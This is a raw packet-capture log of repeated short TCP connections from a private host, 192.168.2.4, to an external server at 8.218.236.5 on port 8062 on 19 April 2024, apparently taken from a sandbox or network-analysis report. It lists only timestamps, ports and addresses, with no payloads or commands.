Apr 19, 2024 09:53:04.446808100 CEST	49971	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:04.446808100 CEST	49971	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:04.446808100 CEST	49971	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:04.564074039 CEST	49972	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:04.773430109 CEST	8062	49971	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:04.881021976 CEST	8062	49972	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:04.881133080 CEST	49972	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:04.881364107 CEST	49972	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:05.198256016 CEST	8062	49972	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:05.200366974 CEST	8062	49972	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:05.200407028 CEST	8062	49972	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:05.200429916 CEST	49972	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:05.200480938 CEST	49972	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:05.201070070 CEST	49972	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:05.315388918 CEST	49973	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:05.518145084 CEST	8062	49972	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:05.629867077 CEST	8062	49973	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:05.629956961 CEST	49973	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:05.630125046 CEST	49973	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:05.944734097 CEST	8062	49973	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:05.950920105 CEST	8062	49973	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:05.950961113 CEST	8062	49973	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:05.951008081 CEST	49973	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:05.951042891 CEST	49973	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:05.951136112 CEST	49973	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:06.065284967 CEST	49974	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:06.265682936 CEST	8062	49973	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:06.391024113 CEST	8062	49974	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:06.391767025 CEST	49974	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:06.392117023 CEST	49974	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:06.717911005 CEST	8062	49974	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:06.719546080 CEST	8062	49974	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:06.719588041 CEST	8062	49974	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:06.719603062 CEST	49974	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:06.719633102 CEST	49974	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:06.719701052 CEST	49974	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:06.834340096 CEST	49975	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:07.045311928 CEST	8062	49974	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:07.157881975 CEST	8062	49975	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:07.157979965 CEST	49975	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:07.158284903 CEST	49975	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:07.481617928 CEST	8062	49975	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:07.483975887 CEST	8062	49975	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:07.484035969 CEST	49975	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:07.484117031 CEST	8062	49975	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:07.484164953 CEST	49975	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:07.595500946 CEST	49975	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:07.595951080 CEST	49976	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:07.919133902 CEST	8062	49975	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:07.921166897 CEST	8062	49976	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:07.921260118 CEST	49976	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:07.924380064 CEST	49976	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:08.249545097 CEST	8062	49976	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:08.251409054 CEST	8062	49976	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:08.251449108 CEST	8062	49976	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:08.251501083 CEST	49976	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:08.252890110 CEST	49976	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:08.361227036 CEST	49976	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:08.361229897 CEST	49977	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:08.686249018 CEST	8062	49976	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:08.697369099 CEST	8062	49977	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:08.697443008 CEST	49977	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:08.697653055 CEST	49977	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:09.033884048 CEST	8062	49977	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:09.035548925 CEST	8062	49977	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:09.035588026 CEST	8062	49977	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:09.035609961 CEST	49977	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:09.035646915 CEST	49977	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:09.035707951 CEST	49977	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:09.142257929 CEST	49978	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:09.371861935 CEST	8062	49977	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:09.480849028 CEST	8062	49978	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:09.480928898 CEST	49978	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:09.481158018 CEST	49978	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:09.820230961 CEST	8062	49978	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:09.822205067 CEST	8062	49978	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:09.822246075 CEST	8062	49978	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:09.822273970 CEST	49978	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:09.822331905 CEST	49978	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:09.822427988 CEST	49978	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:09.938874006 CEST	49979	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:10.160959005 CEST	8062	49978	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:10.259538889 CEST	8062	49979	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:10.261179924 CEST	49979	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:10.261579037 CEST	49979	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:10.582357883 CEST	8062	49979	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:10.583969116 CEST	8062	49979	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:10.584009886 CEST	8062	49979	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:10.584062099 CEST	49979	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:10.584167004 CEST	49979	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:10.584167957 CEST	49979	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:10.688903093 CEST	49980	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:10.904731989 CEST	8062	49979	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:11.002887964 CEST	8062	49980	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:11.002980947 CEST	49980	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:11.003233910 CEST	49980	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:11.317080975 CEST	8062	49980	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:11.323748112 CEST	8062	49980	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:11.323769093 CEST	8062	49980	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:11.323796034 CEST	49980	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:11.323827028 CEST	49980	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:11.328516006 CEST	49980	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:11.498538971 CEST	49981	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:11.644583941 CEST	8062	49980	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:11.815644979 CEST	8062	49981	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:11.816065073 CEST	49981	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:11.816255093 CEST	49981	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:12.133455992 CEST	8062	49981	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:12.135246992 CEST	8062	49981	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:12.135287046 CEST	8062	49981	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:12.135328054 CEST	49981	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:12.135399103 CEST	49981	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:12.135557890 CEST	49981	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:12.251530886 CEST	49982	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:12.452915907 CEST	8062	49981	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:12.565212011 CEST	8062	49982	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:12.566493988 CEST	49982	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:12.567059994 CEST	49982	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:12.880573034 CEST	8062	49982	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:12.882399082 CEST	8062	49982	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:12.882436991 CEST	8062	49982	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:12.882467985 CEST	49982	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:12.882544994 CEST	49982	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:12.916788101 CEST	49982	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:13.056512117 CEST	49983	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:13.230767012 CEST	8062	49982	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:13.374711037 CEST	8062	49983	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:13.374831915 CEST	49983	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:13.449479103 CEST	49983	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:13.767585039 CEST	8062	49983	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:13.769648075 CEST	8062	49983	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:13.769692898 CEST	8062	49983	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:13.769807100 CEST	49983	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:14.288770914 CEST	49983	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:14.441745043 CEST	49984	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:14.607040882 CEST	8062	49983	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:14.756751060 CEST	8062	49984	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:14.756850004 CEST	49984	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:14.757014990 CEST	49984	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:15.071897984 CEST	8062	49984	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:15.073965073 CEST	8062	49984	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:15.073986053 CEST	8062	49984	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:15.074024916 CEST	49984	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:15.074053049 CEST	49984	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:15.074203968 CEST	49984	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:15.189522982 CEST	49985	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:15.388979912 CEST	8062	49984	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:15.505283117 CEST	8062	49985	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:15.505382061 CEST	49985	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:15.509558916 CEST	49985	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:15.825120926 CEST	8062	49985	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:15.826800108 CEST	8062	49985	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:15.826858044 CEST	8062	49985	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:15.826889038 CEST	49985	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:15.826945066 CEST	49985	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:15.827064991 CEST	49985	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:15.940972090 CEST	49986	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:16.142611980 CEST	8062	49985	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:16.263222933 CEST	8062	49986	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:16.263406992 CEST	49986	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:16.263884068 CEST	49986	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:16.585961103 CEST	8062	49986	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:16.588251114 CEST	8062	49986	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:16.588291883 CEST	8062	49986	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:16.588363886 CEST	49986	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:16.588432074 CEST	49986	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:16.704791069 CEST	49987	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:16.911319017 CEST	8062	49986	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:17.036139011 CEST	8062	49987	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:17.036236048 CEST	49987	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:17.036490917 CEST	49987	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:17.370026112 CEST	8062	49987	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:17.372756004 CEST	8062	49987	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:17.372795105 CEST	8062	49987	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:17.372838974 CEST	49987	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:17.372899055 CEST	49987	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:17.372977972 CEST	49987	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:17.486298084 CEST	49988	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:17.705967903 CEST	8062	49987	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:17.812309027 CEST	8062	49988	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:17.812469959 CEST	49988	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:17.812802076 CEST	49988	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:18.138695002 CEST	8062	49988	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:18.140562057 CEST	8062	49988	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:18.140600920 CEST	8062	49988	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:18.140960932 CEST	49988	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:18.141097069 CEST	49988	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:18.251636982 CEST	49989	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:18.466849089 CEST	8062	49988	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:18.563343048 CEST	8062	49989	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:18.563492060 CEST	49989	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:18.567483902 CEST	49989	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:18.879077911 CEST	8062	49989	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:18.880848885 CEST	8062	49989	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:18.880887985 CEST	8062	49989	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:18.881053925 CEST	49989	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:18.881053925 CEST	49989	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:18.881053925 CEST	49989	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:18.986812115 CEST	49990	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:19.192940950 CEST	8062	49989	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:19.302169085 CEST	8062	49990	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:19.302267075 CEST	49990	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:19.302506924 CEST	49990	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:19.617997885 CEST	8062	49990	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:19.620202065 CEST	8062	49990	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:19.620248079 CEST	8062	49990	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:19.620287895 CEST	49990	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:19.620374918 CEST	49990	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:19.620429993 CEST	49990	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:19.738399029 CEST	49991	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:19.935880899 CEST	8062	49990	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:20.064338923 CEST	8062	49991	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:20.064502001 CEST	49991	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:20.064766884 CEST	49991	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:20.390547037 CEST	8062	49991	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:20.393155098 CEST	8062	49991	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:20.393213034 CEST	8062	49991	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:20.393482924 CEST	49991	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:20.393482924 CEST	49991	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:20.502388000 CEST	49992	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:20.719582081 CEST	8062	49991	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:20.816498041 CEST	8062	49992	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:20.816590071 CEST	49992	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:20.816903114 CEST	49992	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:21.130978107 CEST	8062	49992	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:21.132951021 CEST	8062	49992	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:21.132987976 CEST	8062	49992	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:21.133037090 CEST	49992	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:21.133038044 CEST	49992	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:21.133121014 CEST	49992	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:21.235865116 CEST	49993	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:21.447272062 CEST	8062	49992	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:21.557230949 CEST	8062	49993	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:21.557322025 CEST	49993	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:21.557499886 CEST	49993	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:21.879997015 CEST	8062	49993	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:21.881849051 CEST	8062	49993	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:21.881890059 CEST	8062	49993	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:21.882198095 CEST	49993	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:21.882510900 CEST	49993	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:21.986068964 CEST	49994	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:22.203881979 CEST	8062	49993	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:22.309613943 CEST	8062	49994	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:22.309758902 CEST	49994	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:22.309899092 CEST	49994	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:22.633569002 CEST	8062	49994	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:22.635960102 CEST	8062	49994	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:22.635998964 CEST	8062	49994	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:22.636029959 CEST	49994	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:22.636123896 CEST	49994	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:22.636509895 CEST	49994	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:22.753752947 CEST	49995	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:22.960185051 CEST	8062	49994	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:23.070225000 CEST	8062	49995	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:23.070301056 CEST	49995	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:23.070533037 CEST	49995	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:23.386907101 CEST	8062	49995	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:23.388683081 CEST	8062	49995	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:23.388722897 CEST	8062	49995	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:23.388737917 CEST	49995	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:23.388775110 CEST	49995	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:23.388889074 CEST	49995	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:23.507386923 CEST	49996	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:23.705358982 CEST	8062	49995	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:23.828344107 CEST	8062	49996	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:23.828691959 CEST	49996	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:23.834366083 CEST	49996	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:24.155168056 CEST	8062	49996	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:24.156874895 CEST	8062	49996	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:24.156910896 CEST	8062	49996	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:24.157067060 CEST	49996	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:24.157067060 CEST	49996	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:24.157157898 CEST	49996	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:24.269422054 CEST	49997	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:24.478068113 CEST	8062	49996	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:24.578758955 CEST	8062	49997	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:24.582207918 CEST	49997	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:24.582694054 CEST	49997	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:24.891824961 CEST	8062	49997	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:24.897120953 CEST	8062	49997	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:24.897161961 CEST	8062	49997	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:24.897221088 CEST	49997	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:24.897222042 CEST	49997	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:24.897315979 CEST	49997	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:25.004146099 CEST	49998	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:25.206798077 CEST	8062	49997	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:25.328311920 CEST	8062	49998	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:25.328411102 CEST	49998	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:25.328644037 CEST	49998	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:25.652776003 CEST	8062	49998	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:25.654896975 CEST	8062	49998	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:25.654937029 CEST	8062	49998	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:25.655117989 CEST	49998	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:25.655118942 CEST	49998	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:25.655206919 CEST	49998	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:25.768970966 CEST	49999	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:25.979254961 CEST	8062	49998	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:26.106525898 CEST	8062	49999	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:26.106620073 CEST	49999	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:26.107017040 CEST	49999	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:26.444823027 CEST	8062	49999	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:26.446506023 CEST	8062	49999	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:26.446543932 CEST	8062	49999	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:26.449229002 CEST	49999	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:26.449389935 CEST	49999	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:26.564018965 CEST	50000	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:26.785993099 CEST	8062	49999	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:26.899329901 CEST	8062	50000	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:26.899422884 CEST	50000	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:26.899646997 CEST	50000	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:27.234637976 CEST	8062	50000	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:27.236583948 CEST	8062	50000	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:27.236624002 CEST	8062	50000	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:27.236649990 CEST	50000	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:27.236692905 CEST	50000	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:27.236756086 CEST	50000	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:27.346282005 CEST	50001	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:27.572222948 CEST	8062	50000	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:27.661068916 CEST	8062	50001	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:27.661165953 CEST	50001	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:27.661407948 CEST	50001	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:27.975790024 CEST	8062	50001	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:27.977720022 CEST	8062	50001	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:27.977756977 CEST	8062	50001	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:27.977854013 CEST	50001	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:27.978111029 CEST	50001	8062	192.168.2.4	8.218.236.5
